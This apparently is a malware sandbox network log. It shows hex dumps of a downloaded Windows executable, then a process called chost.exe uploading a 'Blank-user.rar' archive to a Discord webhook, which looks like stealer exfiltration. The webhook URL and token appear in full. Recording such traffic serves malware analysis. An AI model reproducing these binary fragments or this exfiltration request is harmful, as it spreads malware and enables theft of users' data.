                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 3d 90 33 30 5c fe 60 30 5c fe 60 30 5c fe 60 7b 24 fd 61 37 5c fe 60 7b 24 fb 61 84 5c fe 60 7b 24 fa 61 3a 5c fe 60 20 d8 03 60 33 5c fe 60 20 d8 fd 61 39 5c fe 60 20 d8 fa 61 21 5c fe 60 20 d8 fb 61 18 5c fe 60 7b 24 ff 61 3b 5c fe 60 30 5c ff 60 ab 5c fe 60 7b d9 fa 61 29 5c fe 60 7b d9 fc 61 31 5c fe 60 52 69 63 68 30 5c fe 60 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$t=30\`0\`0\`{$a7\`{$a\`{$a:\` `3\` a9\` a!\` a\`{$a;\`0\`\`{a)\`{a1\`Rich0\`PEd
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: d8 48 8b fb 4d 8b cc 41 b8 01 00 00 00 48 0f 47 f8 48 8b cd 48 8b d7 e8 8e f2 00 00 48 83 f8 01 72 69 48 03 ef b8 00 20 00 00 48 2b df 75 cf 8b c6 48 8b 7c 24 70 48 8b 6c 24 60 85 c0 74 0b 49 8b cf e8 f7 3d 01 00 4c 8b fe 49 8b cc e8 08 ef 00 00 49 8b f7 4d 85 ff 74 0e 48 8b d7 49 8b cf e8 19 35 00 00 44 8b e8 48 8b ce e8 ce 3d 01 00 48 8b 5c 24 68 41 8b c5 48 8b 74 24 78 48 83 c4 30 41 5f 41 5e 41 5d 41 5c 5f c3 e8 86 3d 01 00 4d 8d 4e 12 4c 8d 05 4b a6 02 00 48 8d 0d 78 a6 02 00 8b 10 e8 05 17 00 00 41 8b c5 eb 83 48 89 54 24 10 48 89 4c 24 08 53 55 56 57 41 56 41 57 48 81 ec 88 00 00 00 33 c0 4d 8b f0 48 8b da 48 89 44 24 50 48 8b f9 48 89 44 24 58 41 b8 58 00 00 00 48 89 44 24 60 48 8d 15 70 a4 02 00 89 44 24 28 48 8d 4c 24 20 48 89 44 24 20 8b e8 49
                                                                                                                                                                                                                                      Data Ascii: HMAHGHHHriH H+uH|$pHl$`tI=LIIMtHI5DH=H\$hAHt$xH0A_A^A]A\_=MNLKHxAHT$HL$SUVWAVAWH3MHHD$PHHD$XAXHD$`HpD$(HL$ HD$ I
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 00 49 8b cf e8 77 f0 00 00 85 c0 79 28 e8 a2 38 01 00 4c 8d 4f 12 4c 8d 05 1f a2 02 00 48 8d 0d 54 a2 02 00 8b 10 e8 21 12 00 00 bb ff ff ff ff e9 20 01 00 00 80 7f 10 01 75 18 45 33 c9 4d 8b c4 48 8b d7 49 8b cf e8 00 fb ff ff 8b d8 e9 02 01 00 00 4c 89 6c 24 30 33 db 41 bd 00 20 00 00 4c 89 74 24 28 41 8b cd e8 83 38 01 00 4c 8b f0 48 85 c0 75 28 e8 3a 38 01 00 4c 8d 4f 12 4c 8d 05 bf a0 02 00 48 8d 0d 14 a0 02 00 8b 10 e8 b9 11 00 00 bb ff ff ff ff e9 ae 00 00 00 48 89 74 24 58 8b 77 0c 48 85 f6 0f 84 90 00 00 00 48 89 6c 24 50 66 0f 1f 84 00 00 00 00 00 49 3b f5 48 8b ee 4d 8b cf 41 b8 01 00 00 00 49 0f 47 ed 49 8b ce 48 8b d5 e8 6e ec 00 00 48 83 f8 01 72 36 4d 8b cc 41 b8 01 00 00 00 48 8b d5 49 8b ce e8 94 f3 00 00 48 83 f8 01 72 07 48 2b f5 75 bd
                                                                                                                                                                                                                                      Data Ascii: Iwy(8LOLHT! uE3MHILl$03A Lt$(A8LHu(:8LOLHHt$XwHHl$PfI;HMAIGIHnHr6MAHIHrH+u
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 48 89 93 20 10 00 00 8b 02 48 03 d0 48 3b 93 10 10 00 00 72 86 48 8b cf e8 79 e4 00 00 48 8b b4 24 a8 00 00 00 48 8b c3 48 8b 8c 24 88 00 00 00 48 33 cc e8 62 a9 00 00 4c 8d 9c 24 90 00 00 00 49 8b 5b 20 49 8b 6b 28 49 8b e3 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 48 83 ec 38 49 8b f0 48 8d 6c 24 78 48 8b da 48 8b f9 e8 9b f3 ff ff 48 89 6c 24 28 4c 8b ce 4c 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 2c 2d 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 48 81 ec 80 02 00 00 48 8b 05 42 c3 03 00 48 33 c4 48 89 84 24 70 02 00 00 48 8b 41 18 4c 8d 05 dc 9d 02 00 4c 8b 49 10 48 8b f9 48 83 c1 28 48 89 44 24 20 ba
                                                                                                                                                                                                                                      Data Ascii: H HH;rHyH$HH$H3bL$I[ Ik(I_LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHH,-HH8_^][H\$Hl$Ht$ WHHBH3H$pHALLIHH(HD$
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 83 ec 50 48 8b 05 ae be 03 00 48 33 c4 48 89 44 24 40 48 8b f1 0f b7 ea 48 8b 89 30 20 00 00 45 0f b7 f0 ff 15 af 92 02 00 48 8b d8 48 85 c0 0f 84 90 00 00 00 0f b7 8e 58 20 00 00 33 ff 0f b7 86 5e 20 00 00 48 89 7c 24 30 89 7c 24 3c 8d 14 49 8b cd 2b ca 48 8b 96 48 20 00 00 2b c8 89 4c 24 38 48 85 d2 74 0c 48 8b cb ff 15 40 8e 02 00 48 8b f8 48 8d 56 28 c7 44 24 20 50 25 00 00 4c 8d 4c 24 30 41 b8 ff ff ff ff 48 8b cb ff 15 4d 92 02 00 48 83 be 48 20 00 00 00 74 0c 48 8b d7 48 8b cb ff 15 07 8e 02 00 48 8b 8e 30 20 00 00 48 8b d3 ff 15 17 92 02 00 0f b7 54 24 3c 66 2b 54 24 34 eb 05 ba 14 00 00 00 0f b7 8e 60 20 00 00 44 0f b7 8e 5e 20 00 00 66 3b d1 0f b7 c1 c7 44 24 28 01 00 00 00 66 0f 43 c2 89 4c 24 20 0f b7 96 58 20 00 00 48 8b 8e 28 20 00 00 44 8b
                                                                                                                                                                                                                                      Data Ascii: PHH3HD$@HH0 EHHX 3^ H|$0|$<I+HH +L$8HtH@HHV(D$ P%LL$0AHMHH tHHH0 HT$<f+T$4` D^ f;D$(fCL$ X H( D
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 8b d7 48 8b 08 48 83 c9 01 e8 50 25 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 48 83 c4 38 5f 5e 5d 5b c3 cc cc cc cc cc 48 89 4c 24 08 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 41 56 b8 40 10 00 00 e8 8c a1 00 00 48 2b e0 48 8b 05 02 b9 03 00 48 33 c4 48 89 84 24 30 10 00 00 48 8b e9 4c 8d b4 24 78 10 00 00 48 8d 7c 24 30 bb 00 10 00 00 33 f6 e8 0b 2b 01 00 44 8b c8 4c 8d 05 c9 94 02 00 48 8d 05 a2 95 02 00 8b d3 48 8d 4c 24 30 48 89 44 24 20 e8 f9 f4 ff ff 85 c0 78 19 48 63 c8 48 8d 7c 24 30 8b f0 48 03 f9 2b d8 b8 00 00 00 00 0f 49 c3 8b d8 48 63 db e8 94 e8 ff ff 4c 89 74 24 28 4c 8b cd 4c 8b c3 48 c7 44 24 20 00 00 00 00 48 8b d7 48 8b 08 48 83 c9 02 e8 25 22 01 00 4c 8d 0d 4a 95 02 00 c7 44 24 20 10 00 00 00 4c 8d 05 53 95 02 00 8b d6 48 8d
                                                                                                                                                                                                                                      Data Ascii: HHP%HH8_^][HL$HT$LD$LL$ SUVWAV@H+HH3H$0HL$xH|$03+DLHHL$0HD$ xHcH|$0H+IHcLt$(LLHD$ HHH%"LJD$ LSH
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 5b c3 cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 55 56 57 41 54 41 55 41 56 41 57 b8 58 20 00 00 e8 50 9c 00 00 48 2b e0 48 8b 05 c6 b3 03 00 48 33 c4 48 89 84 24 40 20 00 00 45 33 ed 48 8d 74 24 40 41 8b ed 4d 8b f8 44 8b e2 4c 8b f1 bf 00 10 00 00 e8 cd 25 01 00 44 8b c8 4c 8d 05 d3 8f 02 00 8b d7 48 8d 4c 24 40 e8 f7 f9 ff ff 85 c0 78 18 48 63 c8 48 8d 74 24 40 8b e8 48 8d 34 4e 8b cf 2b c8 41 8b fd 0f 49 f9 48 63 df e8 63 e3 ff ff 4d 8b cf 4c 8b c3 48 8b d6 48 8b 08 48 8d 84 24 b8 20 00 00 48 89 44 24 28 48 83 c9 01 4c 89 6c 24 20 e8 44 1f 01 00 85 c0 b9 ff ff ff ff 0f 48 c1 85 c0 78 0d 48 63 c8 2b f8 41 0f 48 fd 48 8d 34 4e 48 63 d7 4c 8d 05 77 8f 02 00 4d 8b ce 48 8b ce e8 7c f9 ff ff 85 c0 78 0d 48 63 c8 2b f8 41 0f 48 fd 48 8d 34 4e 4c 89 6c 24 30 41
                                                                                                                                                                                                                                      Data Ascii: [LD$LL$ SUVWATAUAVAWX PH+HH3H$@ E3Ht$@AMDL%DLHL$@xHcHt$@H4N+AIHccMLHHH$ HD$(HLl$ DHxHc+AHH4NHcLwMH|xHc+AHH4NLl$0A
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: ff ff 48 8b d8 48 3b 86 10 10 00 00 0f 82 f0 fe ff ff 33 c0 48 8b 9c 24 98 10 00 00 48 8b bc 24 a8 10 00 00 48 8b ac 24 a0 10 00 00 4c 8b b4 24 60 10 00 00 4c 8b a4 24 68 10 00 00 48 8b 8c 24 50 10 00 00 48 33 cc e8 c6 93 00 00 48 81 c4 70 10 00 00 41 5f 41 5d 5e c3 48 8b 05 f2 eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 8d 82 02 00 48 8b 05 de eb 03 00 4c 8d 44 24 38 48 8d 54 24 30 48 8d 4c 24 40 ff 15 71 82 02 00 48 8b 4c 24 30 33 f6 48 8b 05 33 ec 03 00 ff 15 5d 82 02 00 48 8b f8 48 8b c8 48 8b 05 50 ec 03 00 ff 15 4a 82 02 00 48 85 c0 74 0b 48 8b c8 e8 01 72 01 00 48 8b f0 48 8b 05 13 eb 03 00 48 8b cf ff 15 2a 82 02 00 41 80 bd 78 30 00 00 00 74 0e 48 8d 0d c1 8c 02 00 e8 d8 71 01 00 eb 1a 4c 8b 44 24 38 41 b9 02 00 00 00 48 8b 54 24
                                                                                                                                                                                                                                      Data Ascii: HH;3H$H$H$L$`L$hH$PH3HpA_A]^HLD$8HT$0HL$@HLD$8HT$0HL$@qHL$03H3]HHHPJHtHrHHH*Ax0tHqLD$8AHT$
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 48 8d 4c 24 20 e8 d6 5b 00 00 48 8d 4c 24 20 85 c0 74 5a 48 8d 94 24 20 20 00 00 e8 40 5c 00 00 85 c0 79 18 48 8d 54 24 20 48 8d 0d 60 8c 02 00 e8 cb f0 ff ff b8 ff ff ff ff eb 59 41 b8 04 00 00 00 48 8d 94 24 20 20 00 00 48 8d 0d 9f 8c 02 00 e8 12 1b 01 00 33 d2 b9 08 00 00 00 85 c0 48 8d 84 24 20 20 00 00 0f 45 ca 48 03 c8 41 b8 00 10 00 00 48 8b d3 e8 25 5d 00 00 48 85 c0 75 13 48 8d 0d 79 8c 02 00 e8 74 f0 ff ff b8 ff ff ff ff eb 02 33 c0 48 8b 8c 24 20 40 00 00 48 33 cc e8 0b 8e 00 00 48 81 c4 30 40 00 00 5b c3 cc cc 40 55 57 41 54 b8 80 20 00 00 e8 f1 90 00 00 48 2b e0 48 8b 05 67 a8 03 00 48 33 c4 48 89 84 24 60 20 00 00 48 8b f9 b9 02 00 00 00 e8 6f 1c 01 00 48 8b c8 33 d2 e8 f9 1c 01 00 48 8d 4f 10 e8 ac fe ff ff 85 c0 79 0c 48 c7 c0 ff ff ff ff
                                                                                                                                                                                                                                      Data Ascii: HL$ [HL$ tZH$ @\yHT$ H`YAH$ H3H$ EHAH%]HuHyt3H$ @H3H0@[@UWAT H+HgH3H$` HoH3HOyH
                                                                                                                                                                                                                                      2024-12-05 18:36:29 UTC1378INData Raw: 24 b8 20 00 00 4c 8b bc 24 70 20 00 00 48 8b b4 24 b0 20 00 00 4c 8b b4 24 78 20 00 00 48 8b 9c 24 a8 20 00 00 48 8b 8c 24 60 20 00 00 48 33 cc e8 19 89 00 00 48 81 c4 80 20 00 00 41 5c 5f 5d c3 48 8b cf e8 95 4b 00 00 85 c0 79 09 48 8d 0d f2 83 02 00 eb a0 48 8d 9f 22 20 00 00 e9 b3 00 00 00 48 8d 0d ed 82 02 00 e8 40 4d 00 00 48 8b f0 48 85 c0 74 4d 80 38 00 74 48 48 8d 9f 22 20 00 00 4c 8b c8 48 8b cb 4c 8d 05 7b 7d 02 00 ba 00 10 00 00 e8 75 df ff ff 3d 00 10 00 00 7c 19 48 8d 0d 07 84 02 00 e8 f2 e9 ff ff 48 8b ce e8 7a 12 01 00 e9 42 ff ff ff 48 8b ce e8 6d 12 01 00 eb 52 48 8d 0d a4 83 02 00 e9 27 ff ff ff 48 8d 57 10 48 8d 4c 24 60 e8 81 07 00 00 4c 8b 87 70 30 00 00 48 8d 9f 22 20 00 00 48 8b cb 4d 85 c0 74 0c 48 8d 54 24 60 e8 b1 08 00 00 eb 16
                                                                                                                                                                                                                                      Data Ascii: $ L$p H$ L$x H$ H$` H3H A\_]HKyHH" H@MHHtM8tHH" LHL{}u=|HHzBHmRH'HWHL$`Lp0H" HMtHT$`


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.449766162.159.138.232443280C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC302OUTPOST /api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG HTTP/1.1
                                                                                                                                                                                                                                      Host: discord.com
                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                      Content-Length: 446171
                                                                                                                                                                                                                                      User-Agent: python-urllib3/2.2.3
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=5645850d9eec13ce7bafd163781539ae
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: 2d 2d 35 36 34 35 38 35 30 64 39 65 65 63 31 33 63 65 37 62 61 66 64 31 36 33 37 38 31 35 33 39 61 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 ec b8 c9 a5 21 04 00 00 01 0f 9e 35 db 26 c6 10 50 18 b1 18 9a e4 70 61 61 8b 32 1e be ac f8 be be 88 3b bb 58 7f c4 7b 19 df 4e 73 a6 67 51 5d fa fc 0e 80 5e b9 3e 3d 3d dc df c4 e1 04 c2 dd 77 83 e9 64 6e 82 dd 73 1b 6c 17 e4 49 46 3d 61 94 22 ed d2 97 5d 73 fc 83 b5 6b 73 f4 a9 4b 4e
                                                                                                                                                                                                                                      Data Ascii: --5645850d9eec13ce7bafd163781539aeContent-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!5&Ppaa2;X{NsgQ]^>==wdnslIF=a"]sksKN
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: 14 3a a0 61 5f 89 f6 06 93 11 05 ad 13 a1 6c ef 84 22 03 dd 10 4a 90 3c 1c 35 3b 7e 7d bd 36 53 67 7e 12 93 bd 8b c0 6d 61 f9 ce 3a c4 9c 03 19 a7 89 af 2c c4 98 76 31 27 79 52 23 dc 21 52 d3 c7 f0 84 c8 56 f9 ce 58 d4 d5 09 e7 e0 6e 15 b1 59 ca 4e 56 b5 9a 7d 43 49 32 32 c4 e9 70 0d c2 2c 34 34 19 69 0f 84 db 5a b1 1f 3e d6 88 d1 fc 51 0f 28 e9 d2 a8 89 23 b8 22 7c 35 d1 5c 39 02 9c fa 79 0f 48 76 5f 86 3d d7 0e 59 72 29 43 ee 3f 79 5b 4d c9 e1 f7 d7 b2 03 bf 71 4d f3 7d 19 d5 0b f9 89 b6 e2 df a4 03 bb fa 9e 52 a8 e3 b2 e8 a3 41 80 0f 27 19 c3 d5 ca 93 86 35 e7 18 04 f0 cd eb 50 aa c7 d6 18 c7 3e c8 7e 70 99 0e 4e 3f 7d d8 64 72 86 7f 96 84 24 42 f7 b1 4a 5c 31 eb b3 93 5e 7c 37 60 ed 36 bf 1d 3e e8 5d ea e6 45 8e 90 cf 9a 86 c6 08 fd c4 e3 00 7a 22 49
                                                                                                                                                                                                                                      Data Ascii: :a_l"J<5;~}6Sg~ma:,v1'yR#!RVXnYNV}CI22p,44iZ>Q(#"|5\9yHv_=Yr)C?y[MqM}RA'5P>~pN?}dr$BJ\1^|7`6>]Ez"I
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: 3e e1 a7 60 80 1d 97 72 a4 b7 49 80 5c 96 17 c1 3c 8b ad 8f a7 e7 71 91 fa 7e 08 c0 71 18 ab 7c e1 98 b0 ef 55 c6 9c 5c 0f 3b 92 6c 88 7e a2 60 40 e6 17 52 a5 0d 47 b2 46 8e 8f f2 33 16 ca d1 71 a2 db 68 58 77 1b 26 6d 43 cc 62 f9 b3 a7 d7 28 ef 3d 70 85 29 fa f1 56 b2 2d b3 e1 9b 42 0b 16 68 d2 b9 b7 21 a4 28 65 fe ff ca e8 ac d8 fd 6f bc cd b5 7c fe 7a fe 03 65 81 8a ef 86 3d d6 cb 5e c0 f1 4d d5 2a 17 0a 48 1c 04 5b 79 1e 97 e3 33 1c 81 0b 4b 0d c3 ef 98 62 40 04 59 d5 59 c2 3c e0 08 d8 54 3b a9 d3 e4 01 85 ec 94 e6 ab 7f 0e c7 7e c6 98 f3 c7 38 fc 05 55 68 51 57 3c 84 e9 5d 21 ed 6f 38 85 97 68 37 15 ae b9 4c e8 32 c2 01 6d 11 80 08 5d b4 d8 53 46 ec 9a e3 10 b0 4a 18 2b a5 9b 81 78 8a e9 16 52 a9 a6 dc 48 1b b4 6c bd da 60 ab 8d 48 db 55 30 44 f8 82
                                                                                                                                                                                                                                      Data Ascii: >`rI\<q~q|U\;l~`@RGF3qhXw&mCb(=p)V-Bh!(eo|ze=^M*H[y3Kb@YY<T;~8UhQW<]!o8h7L2m]SFJ+xRHl`HU0D
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: fd 2c 8b dd 2d c3 d2 b7 6b fe b2 95 e6 27 d2 ef a8 9d 86 24 78 94 c9 35 c2 a4 66 bb 59 02 41 5c 6a 37 32 5a 14 ce 67 c6 0c 94 ae 79 cb e9 45 7b 5e 60 a2 44 96 76 93 1b dd 1e 57 ae 37 db 67 a9 0c a0 54 bd af 7a 0d 7d e5 27 9e 8a ac 3f 08 19 68 39 be 4f bc 67 07 46 27 ae be 13 3a 85 75 c3 65 fe 15 40 af 1c 65 a7 cc c7 f1 ae e6 87 84 35 10 03 50 ca 22 08 f7 bf 51 22 19 24 ab 05 b1 a2 c8 7b f2 c8 02 e7 e8 3a 11 ba 46 b1 9e 2d 66 17 b9 fd ac 61 81 b2 63 f5 7c a7 12 64 53 91 ab 41 19 44 f4 57 86 85 62 96 43 ea 9e 5c 77 39 9b bd ea 81 11 7c 14 1e 02 fe 20 d8 08 d2 6c 3d be 38 d8 57 14 26 f2 f1 7e 7f 92 89 a8 ca 6d a1 85 47 73 ab 6c 42 01 05 77 86 83 cc 1a a2 ea e8 2a 40 f1 5d 48 93 59 7f ac a2 4d 82 f4 eb 3f e3 9d a1 ac da b7 2b 40 29 75 ef f6 e1 fa 6d 32 fe 1b
                                                                                                                                                                                                                                      Data Ascii: ,-k'$x5fYA\j72ZgyE{^`DvW7gTz}'?h9OgF':ue@e5P"Q"${:F-fac|dSADWbC\w9| l=8W&~mGslBw*@]HYM?+@)um2
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: 82 4e 65 30 6f 55 7b 4b b6 f9 a4 23 05 ae 92 09 0a 74 95 f8 b6 2a 72 c6 43 12 ac e0 57 0b 41 7a 67 ad 79 a1 57 97 e8 99 67 94 06 1b 4c f2 ba 33 0b d7 cd d2 fd d7 4a dd 50 22 44 65 67 39 e4 2c 28 c2 ff d3 81 aa df 54 cc 60 d4 fe cb 30 a7 32 0c 4e ad f3 f7 0a ac 9b 19 f3 87 4d d7 2f a8 6b 5f 37 8f 15 5b 78 51 3a 79 62 17 6e c7 85 63 ef 83 0c 25 13 b7 0e ad 4b 5d b3 9e 86 40 c9 97 64 5f bb 3d b6 4b 25 ae 1b 85 4d 35 ba 77 20 88 ea 1b 93 36 14 ff bf 5b 82 ac 2b 32 ec bd c8 f7 55 9a 45 84 ea 3b 40 d9 4f e9 a3 1e e9 c3 3a 30 d0 e2 5a 63 54 4c e6 a7 55 8a b3 ce 3f ef ec 7d 1a 36 66 13 43 ac 30 b9 31 6b 82 73 d3 61 45 59 44 a9 8f 98 06 71 f7 3e 83 42 3b 6c a3 9a 14 52 1b 61 b2 6f 38 5a aa 07 2b ab f0 19 4b 74 ba 84 8b 3e bc ca e8 0e eb 99 b9 8e 45 c4 28 92 13 be
                                                                                                                                                                                                                                      Data Ascii: Ne0oU{K#t*rCWAzgyWgL3JP"Deg9,(T`02NM/k_7[xQ:ybnc%K]@d_=K%M5w 6[+2UE;@O:0ZcTLU?}6fC01ksaEYDq>B;lRao8Z+Kt>E(
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: e6 09 63 8b 9a 6a 27 47 85 3b 80 cd 05 59 13 c3 45 14 55 d4 69 d7 de cd fd a1 d7 fb 9a 69 37 a0 c4 44 d6 5f 31 24 9a 2e df 47 c8 38 c5 18 2f 02 fe 45 97 2c 77 f5 13 a6 af 38 e5 49 6c 27 84 cd 82 21 ec 42 a4 96 22 9e 35 15 f0 91 f8 80 f8 71 90 d9 9d 07 a2 ff c7 9e c6 64 72 06 18 f3 03 62 6a 5e bd 68 0b 2c 76 44 c0 58 d2 cd 84 a8 55 19 87 21 f4 23 ee 7f 70 41 0c 77 29 b3 ea 08 14 fb 92 48 cc dc 03 2b c5 a4 63 7b 8a 36 0b 37 71 cf f0 85 b5 95 29 ac e1 39 bb ff 75 87 23 af 79 20 80 b2 9d 9d c0 f3 9b 74 00 34 ad 87 4c 1c e2 c3 43 ea 11 5a f1 fb 4c 33 4c d5 e3 2b 3e 2d 4f db 59 71 0f 14 f2 c5 1b c6 2d 05 d4 dd 50 c1 bf 57 66 36 af 0d 89 16 af f3 5d cf 3e c9 2a ba aa a1 60 62 2d 75 e0 5d 4a 63 3a 6b be 88 49 8c 94 20 5b 3b 34 e5 a9 30 bc e2 9d 52 dc 51 b1 cb 80
                                                                                                                                                                                                                                      Data Ascii: cj'G;YEUii7D_1$.G8/E,w8Il'!B"5qdrbj^h,vDXU!#pAw)H+c{67q)9u#y t4LCZL3L+>-OYq-PWf6]>*`b-u]Jc:kI [;40RQ
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: 75 99 a6 42 fe 15 3b 4f 22 52 5f 84 a7 f2 ae a0 e7 56 88 da 93 56 96 c5 3e 0e 98 c8 6b 26 3e 91 15 d8 27 29 5c f5 50 38 c6 8c e0 1c a4 5a d6 82 e2 e7 d2 c8 f4 f4 87 81 99 8c fa 53 26 4d fd b6 e3 97 1a b5 2e d9 34 28 b8 c6 92 74 26 b1 ce 0a 00 dd cc 93 3a 6c a7 af e4 04 03 d4 aa 99 87 33 95 b7 b4 f6 75 8e 1f cc 5a ce fa c6 8f b6 2b 6e 12 9d 65 12 13 b7 05 19 4b 17 c1 80 25 47 1c 9a a4 fa 2a 8c b7 47 2d 29 c9 08 2f e9 b9 3c b5 30 fc 2f 37 c3 59 c5 0b 8b a0 f4 21 9d 44 b9 02 31 14 a6 b1 b8 a5 0e 8d fd 1f 70 aa 11 e5 5e ed f3 fb f2 1a a2 aa d1 12 58 e7 57 91 70 b9 a9 ba 3d cf 88 40 36 05 15 f7 45 6a ca ca 57 38 5a 99 97 74 95 a6 b7 07 1b c3 92 00 43 69 f5 55 58 fe fb eb 15 7f 7a cb 59 06 e8 f2 6e 60 c7 05 0f 6a 05 c5 f6 b4 f4 f4 d3 37 32 26 06 ca b4 e0 e5 db
                                                                                                                                                                                                                                      Data Ascii: uB;O"R_VV>k&>')\P8ZS&M.4(t&:l3uZ+neK%G*G-)/<0/7Y!D1p^XWp=@6EjW8ZtCiUXzYn`j72&
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: 63 d1 01 c5 57 05 1d 00 17 0f 8b 52 ba 41 d4 4a 66 b6 86 7f 9c 9b 73 0a ba b1 c5 0e 33 a9 d6 7e 36 25 36 a1 1a 18 2c 61 a6 de 8b 81 fc c8 b4 65 32 41 0b 4a 5b 51 5e 4d 9e 8f 4d 48 fb 87 9f 8a 73 95 53 c9 1c fe bb 27 cc 1c 2c e8 ea f4 b3 34 51 d3 5d 2b de db 7c 23 ee e1 d6 a1 b2 67 9d b4 1a 81 b5 84 22 51 50 eb f3 1b 0a ac b9 d9 2e fd b6 20 a4 da c8 92 27 e2 2f 40 5a 46 f4 4a e8 12 9f 86 1a cb f6 e0 08 12 2c ef 9b 11 62 75 30 79 93 67 a6 01 17 d2 38 87 3d 51 b6 62 14 0b 56 43 45 66 f4 ba 1c 8c 3b 0d 26 1e b9 fe 60 a2 c3 f2 ef ca 48 c8 2f 9e 25 66 69 a1 b2 04 28 24 fc e8 65 e6 d0 89 70 f8 65 16 c0 35 d2 a4 c7 93 3f e2 b2 c1 77 f6 c9 fa 5e f3 21 0b be 6e dd 61 37 2d dd 51 e1 ab 33 d1 21 51 95 8c 2b 5d de 0e 99 c7 15 f0 7c 53 c6 bd 82 03 17 bf fc aa 17 54 e9
                                                                                                                                                                                                                                      Data Ascii: cWRAJfs3~6%6,ae2AJ[Q^MMHsS',4Q]+|#g"QP. '/@ZFJ,bu0yg8=QbVCEf;&`H/%fi($epe5?w^!na7-Q3!Q+]|ST
                                                                                                                                                                                                                                      2024-12-05 18:37:21 UTC16384OUTData Raw: a6 15 ee 14 66 be 86 e9 cc 06 a9 21 a9 9b fc 50 02 9d 65 0a 0e 51 5e 0d ef d9 a5 e7 7c b7 86 44 17 50 f1 16 23 fa fb 86 36 6b 6e a5 9e b6 5b db 96 42 d0 ff 0b 50 3d ab 7d 70 e8 03 62 31 00 f5 41 35 e5 e2 89 e6 e2 ee 45 48 d4 d2 96 15 ec 72 98 e4 c1 0c 7e 79 df 6c a5 c4 9f 6d e6 bf 62 2c 9c 0d 11 98 40 8f 7f 08 6c 65 92 3e 4e 55 fa f6 6e f0 a0 9b 69 7b fb d9 02 5c e9 99 71 55 f6 b0 9c 06 0d f6 60 16 ea 66 df 3a 7a 91 fc 0f 2f ee be f0 49 67 66 f4 95 22 d4 34 7a e1 93 7b 24 3c cd ac 4b 0a ec 2f 59 29 91 05 c6 da 0b 29 94 b4 ce c7 3c 4b 46 7c 0e a9 1d 50 03 5a 0c 7f df 2d 25 c6 fe 8f b3 6b 1d 46 b2 9d 5b 27 db 8d 2b ba bd 95 a3 40 e7 af e8 55 74 d8 96 90 64 2d 53 ad c5 08 82 c6 57 f2 ae ce bd 09 c4 59 11 bb b6 91 ee 2f 66 28 71 6b 83 13 2b 8e e7 08 13 31 c6
                                                                                                                                                                                                                                      Data Ascii: f!PeQ^|DP#6kn[BP=}pb1A5EHr~ylmb,@le>NUni{\qU`f:z/Igf"4z{$<K/Y))<KF|PZ-%kF['+@Utd-SWY/f(qk+1
